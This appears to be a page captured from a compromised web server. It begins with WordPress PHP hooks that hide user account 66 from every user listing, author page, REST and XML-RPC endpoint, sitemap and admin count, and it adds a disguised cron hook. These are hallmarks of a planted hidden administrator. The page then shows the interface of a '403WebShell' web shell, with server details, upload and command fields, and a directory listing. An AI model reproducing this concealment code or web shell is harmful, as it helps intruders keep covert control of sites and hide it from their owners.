add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/@babel/runtime/helpers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
February 05 2026 19:13:08
www-data / www-data
0755
esm
--
February 05 2026 19:13:08
www-data / www-data
0755
AwaitValue.js
0.151 KB
February 05 2026 19:13:06
www-data / www-data
0664
OverloadYield.js
0.166 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecoratedDescriptor.js
0.638 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs.js
8.164 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs2203.js
5.984 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs2203R.js
6.429 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs2301.js
7.311 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs2305.js
4.968 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyDecs2311.js
4.481 KB
February 05 2026 19:13:06
www-data / www-data
0664
arrayLikeToArray.js
0.262 KB
February 05 2026 19:13:06
www-data / www-data
0664
arrayWithHoles.js
0.173 KB
February 05 2026 19:13:06
www-data / www-data
0664
arrayWithoutHoles.js
0.252 KB
February 05 2026 19:13:07
www-data / www-data
0664
assertClassBrand.js
0.306 KB
February 05 2026 19:13:07
www-data / www-data
0664
assertThisInitialized.js
0.27 KB
February 05 2026 19:13:07
www-data / www-data
0664
asyncGeneratorDelegate.js
0.821 KB
February 05 2026 19:13:07
www-data / www-data
0664
asyncIterator.js
1.523 KB
February 05 2026 19:13:07
www-data / www-data
0664
asyncToGenerator.js
0.685 KB
February 05 2026 19:13:07
www-data / www-data
0664
awaitAsyncGenerator.js
0.232 KB
February 05 2026 19:13:07
www-data / www-data
0664
callSuper.js
0.497 KB
February 05 2026 19:13:07
www-data / www-data
0664
checkInRHS.js
0.318 KB
February 05 2026 19:13:07
www-data / www-data
0664
checkPrivateRedeclaration.js
0.265 KB
February 05 2026 19:13:07
www-data / www-data
0664
classApplyDescriptorDestructureSet.js
0.4 KB
February 05 2026 19:13:07
www-data / www-data
0664
classApplyDescriptorGet.js
0.201 KB
February 05 2026 19:13:07
www-data / www-data
0664
classApplyDescriptorSet.js
0.304 KB
February 05 2026 19:13:07
www-data / www-data
0664
classCallCheck.js
0.224 KB
February 05 2026 19:13:07
www-data / www-data
0664
classCheckPrivateStaticAccess.js
0.266 KB
February 05 2026 19:13:07
www-data / www-data
0664
classCheckPrivateStaticFieldDescriptor.js
0.298 KB
February 05 2026 19:13:07
www-data / www-data
0664
classExtractFieldDescriptor.js
0.271 KB
February 05 2026 19:13:07
www-data / www-data
0664
classNameTDZError.js
0.24 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldDestructureSet.js
0.42 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldGet.js
0.366 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldGet2.js
0.251 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldInitSpec.js
0.287 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldLooseBase.js
0.273 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldLooseKey.js
0.202 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldSet.js
0.375 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateFieldSet2.js
0.26 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateGetter.js
0.244 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateMethodGet.js
0.25 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateMethodInitSpec.js
0.283 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateMethodSet.js
0.214 KB
February 05 2026 19:13:07
www-data / www-data
0664
classPrivateSetter.js
0.253 KB
February 05 2026 19:13:07
www-data / www-data
0664
classStaticPrivateFieldDestructureSet.js
0.558 KB
February 05 2026 19:13:07
www-data / www-data
0664
classStaticPrivateFieldSpecGet.js
0.512 KB
February 05 2026 19:13:07
www-data / www-data
0664
classStaticPrivateFieldSpecSet.js
0.521 KB
February 05 2026 19:13:07
www-data / www-data
0664
classStaticPrivateMethodGet.js
0.262 KB
February 05 2026 19:13:07
www-data / www-data
0664
classStaticPrivateMethodSet.js
0.236 KB
February 05 2026 19:13:07
www-data / www-data
0664
construct.js
0.464 KB
February 05 2026 19:13:07
www-data / www-data
0664
createClass.js
0.569 KB
February 05 2026 19:13:07
www-data / www-data
0664
createForOfIteratorHelper.js
1.306 KB
February 05 2026 19:13:07
www-data / www-data
0664
createForOfIteratorHelperLoose.js
0.807 KB
February 05 2026 19:13:07
www-data / www-data
0664
createSuper.js
0.624 KB
February 05 2026 19:13:07
www-data / www-data
0664
decorate.js
9.676 KB
February 05 2026 19:13:07
www-data / www-data
0664
defaults.js
0.36 KB
February 05 2026 19:13:07
www-data / www-data
0664
defineAccessor.js
0.255 KB
February 05 2026 19:13:07
www-data / www-data
0664
defineEnumerableProperties.js
0.566 KB
February 05 2026 19:13:07
www-data / www-data
0664
defineProperty.js
0.354 KB
February 05 2026 19:13:07
www-data / www-data
0664
dispose.js
0.951 KB
February 05 2026 19:13:07
www-data / www-data
0664
extends.js
0.492 KB
February 05 2026 19:13:08
www-data / www-data
0664
get.js
0.569 KB
February 05 2026 19:13:08
www-data / www-data
0664
getPrototypeOf.js
0.402 KB
February 05 2026 19:13:08
www-data / www-data
0664
identity.js
0.14 KB
February 05 2026 19:13:08
www-data / www-data
0664
importDeferProxy.js
0.82 KB
February 05 2026 19:13:08
www-data / www-data
0664
inherits.js
0.523 KB
February 05 2026 19:13:08
www-data / www-data
0664
inheritsLoose.js
0.285 KB
February 05 2026 19:13:08
www-data / www-data
0664
initializerDefineProperty.js
0.356 KB
February 05 2026 19:13:08
www-data / www-data
0664
initializerWarningHelper.js
0.309 KB
February 05 2026 19:13:08
www-data / www-data
0664
instanceof.js
0.255 KB
February 05 2026 19:13:08
www-data / www-data
0664
interopRequireDefault.js
0.209 KB
February 05 2026 19:13:08
www-data / www-data
0664
interopRequireWildcard.js
0.971 KB
February 05 2026 19:13:08
www-data / www-data
0664
isNativeFunction.js
0.273 KB
February 05 2026 19:13:08
www-data / www-data
0664
isNativeReflectConstruct.js
0.465 KB
February 05 2026 19:13:08
www-data / www-data
0664
iterableToArray.js
0.254 KB
February 05 2026 19:13:08
www-data / www-data
0664
iterableToArrayLimit.js
0.771 KB
February 05 2026 19:13:08
www-data / www-data
0664
jsx.js
0.798 KB
February 05 2026 19:13:08
www-data / www-data
0664
maybeArrayLike.js
0.367 KB
February 05 2026 19:13:08
www-data / www-data
0664
newArrowCheck.js
0.215 KB
February 05 2026 19:13:08
www-data / www-data
0664
nonIterableRest.js
0.301 KB
February 05 2026 19:13:08
www-data / www-data
0664
nonIterableSpread.js
0.3 KB
February 05 2026 19:13:08
www-data / www-data
0664
nullishReceiverError.js
0.218 KB
February 05 2026 19:13:08
www-data / www-data
0664
objectDestructuringEmpty.js
0.223 KB
February 05 2026 19:13:08
www-data / www-data
0664
objectSpread.js
0.595 KB
February 05 2026 19:13:08
www-data / www-data
0664
objectSpread2.js
0.897 KB
February 05 2026 19:13:08
www-data / www-data
0664
objectWithoutProperties.js
0.54 KB
February 05 2026 19:13:08
www-data / www-data
0664
objectWithoutPropertiesLoose.js
0.335 KB
February 05 2026 19:13:08
www-data / www-data
0664
possibleConstructorReturn.js
0.481 KB
February 05 2026 19:13:08
www-data / www-data
0664
readOnlyError.js
0.188 KB
February 05 2026 19:13:08
www-data / www-data
0664
regenerator.js
3.732 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorAsync.js
0.344 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorAsyncGen.js
0.358 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorAsyncIterator.js
1.069 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorDefine.js
0.721 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorKeys.js
0.341 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorRuntime.js
2.461 KB
February 05 2026 19:13:08
www-data / www-data
0664
regeneratorValues.js
0.623 KB
February 05 2026 19:13:08
www-data / www-data
0664
set.js
0.833 KB
February 05 2026 19:13:08
www-data / www-data
0664
setFunctionName.js
0.405 KB
February 05 2026 19:13:08
www-data / www-data
0664
setPrototypeOf.js
0.391 KB
February 05 2026 19:13:08
www-data / www-data
0664
skipFirstGeneratorNext.js
0.243 KB
February 05 2026 19:13:08
www-data / www-data
0664
slicedToArray.js
0.497 KB
February 05 2026 19:13:08
www-data / www-data
0664
superPropBase.js
0.28 KB
February 05 2026 19:13:08
www-data / www-data
0664
superPropGet.js
0.378 KB
February 05 2026 19:13:08
www-data / www-data
0664
superPropSet.js
0.294 KB
February 05 2026 19:13:08
www-data / www-data
0664
taggedTemplateLiteral.js
0.282 KB
February 05 2026 19:13:08
www-data / www-data
0664
taggedTemplateLiteralLoose.js
0.211 KB
February 05 2026 19:13:08
www-data / www-data
0664
tdz.js
0.198 KB
February 05 2026 19:13:08
www-data / www-data
0664
temporalRef.js
0.271 KB
February 05 2026 19:13:08
www-data / www-data
0664
temporalUndefined.js
0.144 KB
February 05 2026 19:13:08
www-data / www-data
0664
toArray.js
0.462 KB
February 05 2026 19:13:08
www-data / www-data
0664
toConsumableArray.js
0.496 KB
February 05 2026 19:13:08
www-data / www-data
0664
toPrimitive.js
0.482 KB
February 05 2026 19:13:08
www-data / www-data
0664
toPropertyKey.js
0.31 KB
February 05 2026 19:13:08
www-data / www-data
0664
toSetter.js
0.281 KB
February 05 2026 19:13:08
www-data / www-data
0664
tsRewriteRelativeImportExtensions.js
0.417 KB
February 05 2026 19:13:08
www-data / www-data
0664
typeof.js
0.521 KB
February 05 2026 19:13:08
www-data / www-data
0664
unsupportedIterableToArray.js
0.56 KB
February 05 2026 19:13:08
www-data / www-data
0664
using.js
0.581 KB
February 05 2026 19:13:08
www-data / www-data
0664
usingCtx.js
1.764 KB
February 05 2026 19:13:08
www-data / www-data
0664
wrapAsyncGenerator.js
1.858 KB
February 05 2026 19:13:08
www-data / www-data
0664
wrapNativeSuper.js
1.137 KB
February 05 2026 19:13:08
www-data / www-data
0664
wrapRegExp.js
1.942 KB
February 05 2026 19:13:08
www-data / www-data
0664
writeOnlyError.js
0.19 KB
February 05 2026 19:13:08
www-data / www-data
0664

Youez - 2016 - github.com/yon3zu
LinuXploit